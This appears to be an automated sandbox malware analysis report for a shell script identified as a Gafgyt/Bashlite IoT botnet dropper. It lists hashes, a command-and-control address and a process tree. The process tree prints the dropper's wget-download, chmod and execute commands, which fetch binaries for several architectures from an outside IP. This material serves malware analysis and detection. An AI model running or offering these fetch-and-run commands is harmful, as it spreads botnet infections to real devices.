Analysis

  • max time kernel
    37s
  • max time network
    41s
  • platform
    debian-9_armhf
  • resource
    debian9-armhf-20240611-en
  • resource tags

    arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
  • submitted
    28-09-2024 07:55

General

  • Target

    sex.sh

  • Size

    1KB

  • MD5

    884dc57dd0892038d53a2d4b017504df

  • SHA1

    52ab9780591ee9718ce6188a9edafc1afa05dcdf

  • SHA256

    d347e32185478f56ce1c96e1e5dc3ad80ffdcf623036ca6750c60c6183a5c779

  • SHA512

    25e1afb67512005fecdf47712dfc1f0c74ecb221ed0f3904ff47f3ef30948334e31426003f6590c580024f758c7ab8576412a280b5f5ce3f787b6208037db3ca

Malware Config

Extracted

Family

gafgyt

C2

205.185.127.244:23

Signatures

  • Detected Gafgyt variant 4 IoCs
  • Gafgyt/Bashlite

    IoT botnet with numerous variants first seen in 2014.

  • File and Directory Permissions Modification 1 TTPs 4 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Executes dropped EXE 4 IoCs
  • System Network Configuration Discovery 1 TTPs 6 IoCs

    Adversaries may gather information about the network configuration of a system.

  • Writes file to tmp directory 4 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/sex.sh
    /tmp/sex.sh
    1⤵
      PID:644
      • /usr/bin/wget
        wget http://205.185.127.244/mips
        2⤵
        • System Network Configuration Discovery
        • Writes file to tmp directory
        PID:651
      • /bin/chmod
        chmod +x mips
        2⤵
        • File and Directory Permissions Modification
        PID:751
      • /tmp/mips
        ./mips
        2⤵
        • Executes dropped EXE
        • System Network Configuration Discovery
        PID:752
      • /bin/rm
        rm -rf mips
        2⤵
        • System Network Configuration Discovery
        PID:758
      • /usr/bin/wget
        wget http://205.185.127.244/mipsel
        2⤵
        • System Network Configuration Discovery
        • Writes file to tmp directory
        PID:759
      • /bin/chmod
        chmod +x mipsel
        2⤵
        • File and Directory Permissions Modification
        PID:762
      • /tmp/mipsel
        ./mipsel
        2⤵
        • Executes dropped EXE
        • System Network Configuration Discovery
        PID:763
      • /bin/rm
        rm -rf mipsel
        2⤵
        • System Network Configuration Discovery
        PID:765
      • /usr/bin/wget
        wget http://205.185.127.244/sh4
        2⤵
        • Writes file to tmp directory
        PID:766
      • /bin/chmod
        chmod +x sh4
        2⤵
        • File and Directory Permissions Modification
        PID:767
      • /tmp/sh4
        ./sh4
        2⤵
        • Executes dropped EXE
        PID:768
      • /bin/rm
        rm -rf sh4
        2⤵
          PID:770
        • /usr/bin/wget
          wget http://205.185.127.244/x86
          2⤵
          • Writes file to tmp directory
          PID:771
        • /bin/chmod
          chmod +x x86
          2⤵
          • File and Directory Permissions Modification
          PID:772
        • /tmp/x86
          ./x86
          2⤵
          • Executes dropped EXE
          PID:773
        • /bin/rm
          rm -rf x86
          2⤵
            PID:775
          • /usr/bin/wget
            wget http://205.185.127.244/arm61
            2⤵
              PID:776

          Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • /tmp/mips

            Filesize

            176KB

            MD5

            24e07a16008a42f0a8dceb166b4b44cd

            SHA1

            87f80fc2998304bc8735479faa75f509a6d5db13

            SHA256

            c4d4bfc3fa6e216baccce64fe187d70519f11aa8ad33573cfdf1c416bbd0ad6f

            SHA512

            b75a61fc9584e124dbc98556e30166e379dc01ce64312a48906d8e4aed406127aeea1da5f8183e10fe0468908863f7467ac58e71f482c119300836c7c419dab5

          • /tmp/mipsel

            Filesize

            176KB

            MD5

            ac28a3dfa3ed9b815a8021a362b06607

            SHA1

            93455b3775f586e230d8879489f9a6062de70677

            SHA256

            3d9924dddeca5e712bd22e28453437b61eb95c5319e7535737a0bd7a128f30a5

            SHA512

            94c3aae6a3e945aac0beff504c76f454a5f2b78b88d4cd2364cb0f5608dc25183d37bf0338d4fc2966616e95cbe7ef03f34dfb910dd688ae536d9f5a66f1516e

          • /tmp/sh4

            Filesize

            123KB

            MD5

            5ec3c0e18b6fbc6e37bd611e2df8f9a4

            SHA1

            de10e2b7ce11ffa0bc0fcca82a489a3e6efc160d

            SHA256

            9b1ca4aa272007f3ae1a80932a690cd1749ab6f8f7980de0f2e5cd326573c4c6

            SHA512

            76f484543e43cfb33ff449439a64ae08578a7c8142393eed0219f642d7e9401ecf7efe093765be45f1c767d970cc0d280ba53264eb2a6eb7771a7055765e8b20

          • /tmp/x86

            Filesize

            127KB

            MD5

            678363120cd2661f040670b90f211243

            SHA1

            57d75e1c42243d08eb78623e6cdc6b066994a7ee

            SHA256

            cd39c6c637c039bcedc5b906e8c0e602f73c841947b429efc88ec4511d95a36a

            SHA512

            5a2b440135caa5656deb70f7d6274f8bc570e31c6aac4b6aac8375962db512b885afc6223a9767fc0ff7f29dc5377efa441277cb356dba1e3b5716a57f38ca55